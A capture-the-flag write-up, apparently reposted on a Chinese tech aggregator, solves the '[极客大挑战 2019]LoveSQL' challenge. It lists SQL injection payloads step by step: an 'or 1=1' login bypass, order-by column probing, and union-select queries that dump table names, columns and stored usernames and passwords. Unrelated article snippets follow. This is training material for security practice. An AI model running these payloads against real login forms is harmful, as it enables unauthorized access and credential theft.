[极客大挑战 2019]LoveSQL(杂谈)

news/发布时间2024/5/17 15:10:30

开启环境以后注意到有两个框,方向确定是sql,这样的话先试试万能密码好了:

用户名:1' or 1=1#
密码:#随意输入就好

 

出来了一串乱码,尝试解码以后发现什么都不是,接下来尝试不断注入:

/check.php?username=admin' order by 3%23&password=1     存在
/check.php?username=admin' order by 4%23&password=1     报错

可以知道一共出现三个字段。尝试'union'查询测试注入好了:

/check.php?username=1' union select 1,2,3%23&password=1

回显点位为2和3,当前数据库名及版本查看一下:

/check.php?username=1' union select 1,database(),version()%23&password=1

当前数据库为geek,那报表就好了:

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

得到flag:

flag{841f45c9-3871-4b28-af0e-cd992fbc4673}

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ulsteruni.cn/article/87208486.html

如若内容造成侵权/违法违规/事实不符,请联系编程大学网进行投诉反馈email:xxxxxxxx@qq.com,一经查实,立即删除!

相关文章

Linux系统的七个运行级别

Linux系统的七个运行级别

Linux系统有7个运行级别(runlevel):运行级别0:系统停机状态,系统默认运行级别不能设为0,否则不能正常启动 运行级别1:单用户工作状态,root权限,用于系统维护,禁止远程登录 运行级别2:多用户状态(没有NFS) 运行级别3:完全的多用户状态(有NFS),登录后进入控制台命令行…
阅读更多...
系统开放相应接口给第三方平台

系统开放相应接口给第三方平台

SpringSecurity放行接口,匿名访问@EnableGlobalMethodSecurity(prePostEnabled = true, securedEnabled = true) public class SecurityConfig extends WebSecurityConfigurerAdapter {/*** 自定义用户认证逻辑*/@Autowiredprivate UserDetailsService userDetailsService;/**…
阅读更多...
4412板卡, usb hub 经常烧掉

4412板卡, usb hub 经常烧掉

问题: usb hub 经常烧坏。解决:参考3588 底板的 USB的设计。
阅读更多...
arcgis用一个图层分割另一个图层

arcgis用一个图层分割另一个图层

现有用线图层A、面图层B,需使用A图层分割B图层,操作步骤如下: 1、打开Editor编镇工具条,单击Start Editing开始编辑。2、鼠标选中线对象,或者全选线图层(右键单机线图层A依次执行“选择/选择全部”)。 3、打开Advanced editing工具条。 4、选择split polygons, 点确定后…
阅读更多...
肖SIR__ 项目文档(1)_17.0

肖SIR__ 项目文档(1)_17.0

一、需求是如何进行分析的? 1、显性需求(主流程、业务、功能) 例如:需求上明确编写的功能 2、隐性需求 例如:需求上没有明确编写的功能, 发红包流程,隐形需求(红包记录,红包统计) 3、特殊需求 年化收益率3.65%*10000/365=1块 比如:计算公式 4、关联需求 比如:修改了a模块,b模…
阅读更多...
解决Microsoft Store微软应用商店打不开的问题

解决Microsoft Store微软应用商店打不开的问题

1.打开控制面板2.点击网络和Internet3.点击“Internet 选项”4.点击高级5.将TLS1.1TLS1.2TLS1.3都勾选上,并重启计算机
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023